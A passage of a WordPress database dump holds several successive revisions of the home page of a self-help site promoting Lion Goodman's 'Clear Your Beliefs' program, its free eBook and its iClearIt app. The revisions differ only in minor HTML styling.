(1609, 2, '2014-10-24 00:32:49', '2014-10-24 05:32:49', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 94px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p>iClearIt is not yet available for Android or other platforms.</p>\nComplete Program\n\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:32:49', '2014-10-24 05:32:49', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1610, 2, '2014-10-24 00:34:23', '2014-10-24 05:34:23', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 94px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px;text-align: center">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:34:23', '2014-10-24 05:34:23', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1611, 2, '2014-10-24 00:51:02', '2014-10-24 05:51:02', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 70px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:51:02', '2014-10-24 05:51:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1612, 2, '2014-10-24 00:52:37', '2014-10-24 05:52:37', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 70px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:52:37', '2014-10-24 05:52:37', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1613, 2, '2014-10-24 00:55:09', '2014-10-24 05:55:09', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n\nThe <em>Clear Your Beliefs</em> Program… and  How and Why…\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:55:09', '2014-10-24 05:55:09', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1614, 2, '2014-10-24 00:57:02', '2014-10-24 05:57:02', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 20px">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:57:02', '2014-10-24 05:57:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1615, 2, '2014-10-24 01:08:02', '2014-10-24 06:08:02', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em;margin-left: -10px">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="font-size: 1.1em;margin-left: -10px">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because 